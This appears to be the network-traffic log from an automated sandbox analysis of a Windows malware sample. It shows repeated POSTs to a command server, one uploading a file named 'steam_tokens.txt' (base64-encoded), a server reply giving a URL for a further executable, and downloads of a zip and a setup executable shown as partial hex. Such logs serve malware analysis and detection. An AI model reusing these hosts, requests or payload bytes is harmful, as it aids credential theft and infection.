Apr 26, 2024 23:09:33.093175888 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 21:09:32 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 23:09:33.111716986 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----ECFCBFBGDBKJKECAAKKF Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 23:09:33.491712093 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 21:09:33 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 23:09:33.500473976 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JEHJKJEBGHJJKEBGIECA Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 23:09:33.880763054 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 21:09:33 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 23:09:33.888151884 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFHCGHJDBFIIDGDHIJDB Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 23:09:34.281394958 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 21:09:34 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 23:09:35.771856070 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BFBFBFIIJDAKECAKKJEH Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 23:09:36.147408962 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 21:09:36 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 23:09:36.464536905 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGHDHIDGHIDGIECBKKJJ Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 23:09:36.840259075 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 21:09:36 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 23:09:36.852209091 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AEHDAKFIJJKKEBGDBAAK Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 23:09:37.223527908 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 21:09:37 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 23:09:37.240267038 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IEHDBAAFIDGDAAAAAAAA Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 23:09:37.618587971 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 21:09:37 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 23:09:37.832549095 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FHCAEGCBFHJDGCBFHDAF Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 23:09:38.210105896 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 21:09:38 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 23:09:38.233884096 CEST	564	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IEHDBAAFIDGDAAAAAAAA Host: 185.172.128.76 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 45 48 44 42 41 41 46 49 44 47 44 41 41 41 41 41 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 32 33 35 66 30 35 62 66 64 64 65 38 66 61 33 66 61 33 65 65 66 30 64 66 38 63 61 39 34 36 37 62 66 61 65 33 31 36 31 62 34 65 61 64 33 32 63 31 32 34 66 37 63 32 36 37 34 66 32 36 65 35 65 36 33 39 34 32 65 63 62 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 44 42 41 41 46 49 44 47 44 41 41 41 41 41 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 44 42 41 41 46 49 44 47 44 41 41 41 41 41 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------IEHDBAAFIDGDAAAAAAAAContent-Disposition: form-data; name="token"0235f05bfdde8fa3fa3eef0df8ca9467bfae3161b4ead32c124f7c2674f26e5e63942ecb------IEHDBAAFIDGDAAAAAAAAContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------IEHDBAAFIDGDAAAAAAAAContent-Disposition: form-data; name="file"------IEHDBAAFIDGDAAAAAAAA--
Apr 26, 2024 23:09:38.614675999 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 21:09:38 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 23:09:38.725742102 CEST	204	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HDAFIIDAKJDGDHIDAKJJ Host: 185.172.128.76 Content-Length: 124911 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 23:09:39.564052105 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 21:09:39 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 23:09:40.451756954 CEST	469	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GCGHJEBGHJKEBFHIJDHC Host: 185.172.128.76 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 43 47 48 4a 45 42 47 48 4a 4b 45 42 46 48 49 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 32 33 35 66 30 35 62 66 64 64 65 38 66 61 33 66 61 33 65 65 66 30 64 66 38 63 61 39 34 36 37 62 66 61 65 33 31 36 31 62 34 65 61 64 33 32 63 31 32 34 66 37 63 32 36 37 34 66 32 36 65 35 65 36 33 39 34 32 65 63 62 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 4a 45 42 47 48 4a 4b 45 42 46 48 49 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 68 65 72 37 68 34 38 72 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 4a 45 42 47 48 4a 4b 45 42 46 48 49 4a 44 48 43 2d 2d 0d 0a Data Ascii: ------GCGHJEBGHJKEBFHIJDHCContent-Disposition: form-data; name="token"0235f05bfdde8fa3fa3eef0df8ca9467bfae3161b4ead32c124f7c2674f26e5e63942ecb------GCGHJEBGHJKEBFHIJDHCContent-Disposition: form-data; name="message"her7h48r------GCGHJEBGHJKEBFHIJDHC--
Apr 26, 2024 23:09:40.825534105 CEST	223	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 21:09:40 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 52 Connection: keep-alive Data Raw: 61 48 52 30 63 44 6f 76 4c 7a 45 34 4e 53 34 78 4e 7a 49 75 4d 54 49 34 4c 6a 49 77 4d 79 39 30 61 57 74 30 62 32 73 75 5a 58 68 6c 66 44 42 38 4d 48 78 38 Data Ascii: aHR0cDovLzE4NS4xNzIuMTI4LjIwMy90aWt0b2suZXhlfDB8MHx8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49734	176.97.76.106	80	7004	C:\Users\user\Desktop\wxfSIz4PAi.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 23:08:59.852603912 CEST	185	OUT	GET /1/Package.zip HTTP/1.1 Host: note.padd.cn.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Apr 26, 2024 23:09:00.118778944 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Apr 2024 20:53:40 GMT Content-Type: application/zip Content-Length: 3884863 Last-Modified: Wed, 24 Apr 2024 05:45:46 GMT Connection: keep-alive ETag: "66289c8a-3b473f" Strict-Transport-Security: max-age=31536000 Accept-Ranges: bytes Data Raw: 50 4b 03 04 14 00 00 00 08 00 0b 3f 98 58 ef da 8c 80 dd c7 12 00 09 49 14 00 09 00 00 00 62 75 6e 63 68 2e 64 61 74 5c 5d 87 a2 aa 3a 16 cd af 89 8a 20 22 2a 16 10 05 54 ec 15 1b fa f7 b3 d6 4e 3c 77 66 bc ef 58 20 24 3b bb 65 b7 e4 29 a5 ac 9e af 7c 75 5d 2b bc a6 ca 55 2a 56 ea a9 7e af 81 db 9b bd d4 66 da 52 6a 65 f7 f5 b5 1d fe 1a b5 40 f5 66 f8 72 c0 df 56 0d 95 da 17 4a 2d f0 23 55 bd e7 b3 b7 bc 2a b5 de ab 3d ba 54 13 f5 45 13 35 cc 94 5a fa e3 83 aa 26 b5 9e 7a cf 95 fa f4 27 18 6b a2 8e 25 9e cb 4a 65 a9 cb 85 03 dc d4 5b 35 1e e8 cd c6 8f f7 50 c5 db 85 42 7f b5 19 40 05 ac f3 07 2e bf d4 e9 96 a8 47 eb fc 7a 5b 2a 8f 2d 42 31 e2 c3 ce d0 4a 7a 23 0c a9 ce d7 25 de bb 4a b1 fb a6 6a 06 0f d5 57 f5 a4 0e 18 af b5 00 1d 3e 36 32 eb 6a 4b 28 95 bc 0d d4 f1 a3 1a a1 9a c4 a5 02 84 45 b4 54 c9 51 7d d6 6a dd 5f 49 8b 8e 52 ee 54 45 6a a3 3e d2 f1 8b 4f c6 2a 99 3a 4a 25 6f a5 da aa 18 02 8b ec aa a6 b2 60 82 66 2b 4f a9 d6 1c 57 3e 15 87 c0 a3 dd 53 8e 49 4e 43 f5 6d ab 36 be a9 7c 77 51 bb [TRUNCATED] Data Ascii: PK?XIbunch.dat\]: "TN<wfX $;e)\|u]+UV~fRje@frVJ-#U=TE5Z&z'k%Je[5PB@.Gz[-B1Jz#%JjW>62jK(ETQ}j_IRTEj>O:J%o`f+OW>SINCm6\|wQxkKoD:n4P>M_\|PR@gWkXMbMH #oCC!1!RgQc "PQ3HBF\|)@W6Z79d'`_6zr%a7,.l.hvPOf!Y#Y7gv=kJN#\5]<VGU~,Xok.#?v%0+m(mahJG>mVkbBjXV$p ?<^%KA=0\(Ql>;x#W@@tIU Q/e7Ew}h^N +bRz2rfu'os}1j{'%?ZM9.\|PWoc3H\4B;1465Q324$2(9j!$<<P#bLjDvG+}T6tRb"ofh>Z5(]
Apr 26, 2024 23:09:00.118791103 CEST	1289	IN	Data Raw: 9e eb 93 5a 97 53 4c ea 1d 6a 03 c2 62 55 39 25 62 42 ae d3 fa 42 88 fb 27 a8 43 b2 49 31 c3 44 5b ca ba aa 00 34 12 88 ca b9 5f 02 ba 75 fa 98 e6 aa 99 b6 d8 3a 3a ef 40 87 6c d7 24 a1 82 22 2e a6 95 3a 3b ba a7 69 a9 6a a6 7f 61 eb 16 d7 24 8a Data Ascii: ZSLjbU9%bBB'CI1D[4_u::@l$".:;ija$(i2_NXj&4Uh{"~2ReWhP<U0 ~pSM4G?wNx/OVcyb:kW!b'BF*s}f{'L)cz9A0`$zTN1
Apr 26, 2024 23:09:00.118803024 CEST	1289	IN	Data Raw: 91 e8 d4 4f 64 fd 25 3f c7 5c b6 02 a1 e3 62 97 c5 b4 36 30 5c 0f 0b a4 95 e2 4b f3 20 8b ae 74 0a d8 6f 64 c9 cd 0f 89 fb de 6f fc ee 08 20 10 e8 db 99 62 ec 25 9c 25 99 27 b2 b4 24 0c f1 b9 97 af 0f 68 ef 8d 2f cf 5f 68 0e ba fe 1c 0c ff 7d 3c Data Ascii: Od%?\b60\K todo b%%'$h/_h}<?\Z7V6]m!Nm(H\|Im8zn2jk)jPE/d\_r_"R:j4J\CsyuXx3tS9V;,.\|j\[S
Apr 26, 2024 23:09:00.118814945 CEST	1289	IN	Data Raw: 16 d3 e9 46 6e ba ef 9e 3e ac 87 cb 48 1b 8b 1b e2 6e 6b f7 dd 08 4c 39 c4 34 5e c7 86 4d 0e 9b cf 71 d7 69 4c 55 b7 78 9e 89 67 31 89 95 56 76 27 82 62 77 47 32 48 54 a5 75 d1 bb f3 1d 92 03 63 60 f8 fd e3 ff 91 d6 3d dd 13 b9 b9 73 37 31 97 f5 Data Ascii: Fn>HnkL94^MqiLUxg1Vv'bwG2HTuc`=s71(g{qT-#ulNjR:Om@,kfCgsl WEO1lj$z?kLUhPA8XvqbP~iwY2.y\W=1Wq0O}Rl
Apr 26, 2024 23:09:00.118828058 CEST	1289	IN	Data Raw: e1 8d 3e ea ea fb 97 aa 06 3c ad 0a 8f f7 90 2a ca 3a 58 17 34 2e 60 db f4 ce 19 bb 1b 3d d4 b1 15 8a 22 f2 ef 2b 50 21 c1 04 c8 60 9f ba 70 95 bc 1d 95 3b 4b 05 45 2e 89 7c 18 6c 94 7f c0 2f de 2f b4 4e 9c b6 90 6d 9c b4 d5 9d 0d c4 f0 bf c7 9a Data Ascii: ><:X4.`="+P!`p;KE.\|l//Nmnkk&z'74<RY>y=O+MDcSo@x 9c;>-{];@G\{?];[Peqpq=Iqa5`D_AP_GU3[_\|gYA#8
Apr 26, 2024 23:09:00.118840933 CEST	1289	IN	Data Raw: 03 fc cc 1a 92 a0 9d cc 8c 39 c4 b5 34 53 ef 8f ac 49 03 e5 36 a9 6a e7 87 3c e7 54 4e cb 6d 1f d6 0d 6f ed c9 9e e1 e6 ec 91 bf 6b 6a 91 3e cb f1 02 2a e9 eb ac d4 5f ba 11 a4 85 50 ae f5 fa 37 21 1c 57 76 b7 7d 21 ec 4b 32 0f 40 c9 12 33 1e 43 Data Ascii: 94SI6j<TNmokj>_P7!Wv}!K2@3Cs-<HIo5 Q0V?4v^i2D5v$ip^`RLK$.0 ^wS~W _h:JIEE;/?j8-
Apr 26, 2024 23:09:00.118853092 CEST	1289	IN	Data Raw: 23 92 12 a8 ed ec 3a 23 5c c7 33 cd bc 07 1c 47 cf e6 44 fb 2d e3 53 62 a2 58 17 50 1f ac 0c 92 e1 77 b6 56 b3 ba 3a 06 37 24 d5 e2 4d 74 20 4a 83 6e c1 29 9f 67 8b c1 47 5d a4 54 73 8e aa ea 13 c3 23 cc 3c 18 d3 39 ed 82 06 8b b6 ee 95 3b 16 f8 Data Ascii: #:#\3GD-SbXPwV:7$Mt Jn)gG]Ts#<9;1xr5:StLE8:ihFtT%X(]d-nS(W!(.vwpv.[E%AdOZguvYHGv:u\6sEaXu6;\.*
Apr 26, 2024 23:09:00.118868113 CEST	1289	IN	Data Raw: 26 77 2e 9f 11 1f dc c1 ba f5 4f a2 64 c7 94 86 7a 5b 8f bd 8a d0 3a 30 6e e3 7e 84 38 e6 10 7d 0d c4 e3 5d c7 eb b1 98 15 a5 59 c1 e0 e0 a1 be 3e 69 cf ba 61 6a 92 e0 3b 99 7f 83 14 9a 8b f3 12 5f 4b 28 4a 28 cd c3 63 81 59 6e ed d7 e1 53 53 4d Data Ascii: &w.Odz[:0n~8}]Y>iaj;_K(J(cYnSSM2UXf2&3mtvaj8;X!_/dlI8u1J/919FI41iD:5-^kq).ptGO4B?
Apr 26, 2024 23:09:00.118881941 CEST	1289	IN	Data Raw: 00 cc 0a 32 de db 68 03 5c d7 9a 0f ef b0 e7 c6 b2 54 5e 80 d7 df 8b ec ce 42 f0 54 5a fe fc 02 eb 50 7b b8 40 bb a5 87 16 e1 d3 25 f1 f3 d0 bf ac f8 7b 4a 2e d1 42 f0 9a cc 7c 6e fe 24 14 e7 3d ea fe 36 1b 69 9b 63 f8 63 36 25 8e 5a fd b3 78 eb Data Ascii: 2h\T^BTZP{@%{J.B\|n$=6icc6%Zxn1#]\|D;Scv\f-!jID\$[V=!k%cpOSvu'p.B1z3z+L:4Y7U'g`
Apr 26, 2024 23:09:00.118895054 CEST	1289	IN	Data Raw: 70 ec 91 9e 1a b6 f3 5f 25 dc f4 9b bb ac 07 63 42 0f 8f 1e 65 67 df 33 2d d4 fe c1 55 6c 20 fa 23 42 7c ce 66 ad 52 a3 fe 0a 1a 7e ae 37 c5 8c cc 51 67 6a f7 cd 70 5c d0 66 72 69 6f 08 57 5f 4e 81 f1 e9 c4 eb a2 a5 df f6 cc b5 e7 51 ae 56 b8 25 Data Ascii: p_%cBeg3-Ul #B\|fR~7Qgjp\frioW_NQV%#p&osj}(K^"ea/go6&v3\o{Mh3XqAOsrabEtU_P?a#sn9y3u@(T]hN5NPT#hM
Apr 26, 2024 23:09:00.384146929 CEST	1289	IN	Data Raw: db 4d 87 6f fe 6d d4 ff 76 19 6e e6 d5 95 f5 08 7f 96 68 9f cf a1 4b f3 42 8e 7e c5 60 5d fa 32 76 eb b8 3d e7 fe a6 b5 ef 88 7a 69 90 a1 07 6d 40 ca 4d ad 2f f1 0f 46 61 32 9a 7c 9c bf 64 11 6f b6 a4 1a b0 1d 9d 1d 76 3e e4 76 85 e0 ad ef 6b be Data Ascii: MomvnhKB~`]2v=zim@M/Fa2\|dov>vk3#qLj[G?&e<kl9SA/vS/DMLaNjF[3);<g2<pUyru{){N8gk{>\|=r2WRBL]+=K

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49735	185.172.128.228	80	7004	C:\Users\user\Desktop\wxfSIz4PAi.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 23:09:09.366799116 CEST	185	OUT	GET /BroomSetup.exe HTTP/1.1 Host: 185.172.128.228 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Apr 26, 2024 23:09:09.606708050 CEST	1289	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 21:09:09 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Fri, 15 Mar 2024 11:59:56 GMT ETag: "4a4030-613b1bf118700" Accept-Ranges: bytes Content-Length: 4866096 Content-Type: application/x-msdos-program Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 0a 00 84 e1 90 58 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 c4 35 00 00 50 14 00 00 00 00 00 60 d5 35 00 00 10 00 00 00 e0 35 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 d0 [TRUNCATED] Data Ascii: MZP@!L!This program must be run under Win32$7PELX5P`55@J`J@7N<J0(08 878.texth55 `.itext<=5>5 `.dataV5X5@.bssm@7 7.idataN7P 7@.didata8p7@.tls@8z7.rdata 8z7@@.reloc08\|7@B.rsrc<<@@JJ@@ [TRUNCATED]
Apr 26, 2024 23:09:09.606787920 CEST	1289	IN	Data Raw: 61 6e 01 00 00 00 00 01 00 00 00 00 10 40 00 05 46 61 6c 73 65 04 54 72 75 65 06 53 79 73 74 65 6d 02 00 00 00 34 10 40 00 02 08 41 6e 73 69 43 68 61 72 01 00 00 00 00 ff 00 00 00 02 00 00 00 00 50 10 40 00 09 04 43 68 61 72 03 00 00 00 00 ff ff Data Ascii: an@FalseTrueSystem4@AnsiCharP@Charh@ShortInt@SmallInt@Integer@Byte@Word@Pointer@
Apr 26, 2024 23:09:09.606811047 CEST	1289	IN	Data Raw: 74 72 69 65 73 02 00 02 00 00 00 00 24 15 40 00 0e 07 54 4d 65 74 68 6f 64 08 00 00 00 00 00 00 00 00 02 00 00 00 e4 10 40 00 00 00 00 00 02 04 43 6f 64 65 02 00 e4 10 40 00 04 00 00 00 02 04 44 61 74 61 02 00 02 00 06 00 0b 94 7f 40 00 0c 26 6f Data Ascii: tries$@TMethod@Code@Data@&op_Equality@ @Left @Right@&op_Inequality@ @Left @Right@&op_GreaterThan@ @Left @Right@&o
Apr 26, 2024 23:09:09.606843948 CEST	1289	IN	Data Raw: 73 73 02 00 02 00 3b 00 20 85 40 00 0d 4d 65 74 68 6f 64 41 64 64 72 65 73 73 03 00 e4 10 40 00 08 00 02 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 12 e4 11 40 00 01 00 04 4e 61 6d 65 02 00 02 00 3b 00 a4 85 40 00 0d 4d 65 74 68 6f 64 41 64 64 72 Data Ascii: ss; @MethodAddress@Self@Name;@MethodAddress@Self@NameF@MethodName@Self@Address@@=L~@QualifiedClassName@Self@
Apr 26, 2024 23:09:09.606868982 CEST	1289	IN	Data Raw: 63 65 00 00 00 00 01 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 06 53 79 73 74 65 6d 03 00 ff ff 02 00 00 00 50 1f 40 00 0f 0b 49 45 6e 75 6d 65 72 61 62 6c 65 18 1f 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 53 79 73 74 65 Data Ascii: ceFSystemP@IEnumerable@System@IDispatch@FSystemD$UD$sD$@@@F@@\ @@<!@\
Apr 26, 2024 23:09:09.606880903 CEST	1289	IN	Data Raw: 40 00 01 00 00 00 00 02 00 3c 24 40 00 14 09 50 56 61 72 41 72 72 61 79 50 24 40 00 02 00 00 00 00 54 24 40 00 0e 09 54 56 61 72 41 72 72 61 79 18 00 00 00 00 00 00 00 00 06 00 00 00 cc 10 40 00 00 00 00 00 02 08 44 69 6d 43 6f 75 6e 74 02 00 cc Data Ascii: @<$@PVarArrayP$@T$@TVarArray@DimCount@Flags@ElementSize@LockCount@Data$@Bounds$@TVarRecord@PRecord@RecI
Apr 26, 2024 23:09:09.606914997 CEST	1289	IN	Data Raw: 41 00 f4 ff 24 2c 40 00 43 00 f4 ff 5a 2c 40 00 43 00 f4 ff a5 2c 40 00 43 00 f4 ff d9 2c 40 00 43 00 f4 ff 3b 2d 40 00 43 00 f4 ff 9d 2d 40 00 43 00 f4 ff ff 2d 40 00 43 00 f4 ff 61 2e 40 00 43 00 f4 ff c3 2e 40 00 43 00 f4 ff 25 2f 40 00 43 00 Data Ascii: A$,@CZ,@C,@C,@C;-@C-@C-@Ca.@C.@C%/@C/@C/@CK0@C0@C1@Cq1@C1@C52@C2@C2@C;3@C~3@C3@C4@CE4@C4@C4@C=5@C5@C5@C
Apr 26, 2024 23:09:09.606947899 CEST	1289	IN	Data Raw: 0c 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 30 e4 40 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 d0 41 40 00 01 00 03 53 72 63 02 00 00 9c 10 Data Ascii: StartIndex@Countb0@CopySelfA@Src@StartIndex'@Dest@Countb@CopySelf'@SrcA@Dest@StartIndex@Countb@Copy
Apr 26, 2024 23:09:09.606997013 CEST	1289	IN	Data Raw: 36 03 00 80 10 40 00 08 00 03 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 9c 27 40 00 01 00 03 50 74 72 02 00 00 54 11 40 00 02 00 03 4f 66 73 02 00 02 00 43 00 d4 e8 40 00 09 52 65 61 64 49 6e 74 33 32 03 00 9c 10 40 00 08 00 03 00 00 00 00 00 Data Ascii: 6@Self'@PtrT@OfsC@ReadInt32@Self'@PtrT@OfsC@ReadInt64@Self'@PtrT@OfsA@ReadPtr'@Self'@PtrT@
Apr 26, 2024 23:09:09.607007980 CEST	1289	IN	Data Raw: 00 00 00 00 04 53 65 6c 66 02 00 01 00 00 00 00 01 00 05 56 61 6c 75 65 02 00 02 00 3e 00 78 ea 40 00 11 41 6c 6c 6f 63 53 74 72 69 6e 67 41 73 41 6e 73 69 03 00 9c 27 40 00 08 00 02 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 b8 12 40 00 01 00 Data Ascii: SelfValue>x@AllocStringAsAnsi'@Self@StrP@AllocStringAsAnsi'@Self@Str@CodePageA@AllocStringAsUnicode'@Self@Str<l@A
Apr 26, 2024 23:09:09.846549034 CEST	1289	IN	Data Raw: 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 9c 27 40 00 01 00 03 50 74 72 02 00 02 b8 12 40 00 02 00 05 56 61 6c 75 65 02 00 00 9c 10 40 00 0c 00 0f 4d 61 78 43 68 61 72 73 49 6e 63 4e 75 6c 6c 02 00 00 cc 10 40 00 08 00 08 43 6f 64 65 50 61 67 65 Data Ascii: Self'@Ptr@Value@MaxCharsIncNull@CodePages@WriteStringAsAnsiSelf'@PtrT@Ofs@Value@MaxCharsIncNull@WriteStringAsAnsiS

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49739	20.157.87.45	80	3428	C:\Users\user\AppData\Local\Temp\u5ek.3.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 23:09:13.491075993 CEST	266	OUT	POST /__svc/sbv/DownloadManager.ashx HTTP/1.0 Connection: keep-alive Content-Length: 300 Host: svc.iolo.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: identity User-Agent: Mozilla/3.0 (compatible; Indy Library)
Apr 26, 2024 23:09:13.732300997 CEST	300	OUT	Data Raw: 2f 65 5a 42 73 2b 42 6c 51 46 58 71 30 59 64 4b 4f 31 72 57 47 6b 67 6a 65 44 4b 4a 4a 32 7a 4e 41 34 53 38 48 69 44 55 4c 56 41 66 46 76 61 45 49 51 2b 2f 6c 33 6e 69 78 46 78 62 4d 79 2b 36 32 6f 73 72 64 32 2b 64 57 65 6e 6f 6b 77 76 6c 48 62 Data Ascii: /eZBs+BlQFXq0YdKO1rWGkgjeDKJJ2zNA4S8HiDULVAfFvaEIQ+/l3nixFxbMy+62osrd2+dWenokwvlHbQ3q8eV0Qx+sRVrwIuOdpxbCQ6/gpdrdPc0dPp2yFiTtXpXLFc20MMPt736DHHnFUtB8RByJnUp0u2/VdqgLICfLL1rJJAjFmZqgUei5EZzhfnEiR5dqfQ3Z0YLnFtVOWwMFg4lvwpMiNrtOx5Ld+YvOlUKSq2A7tC
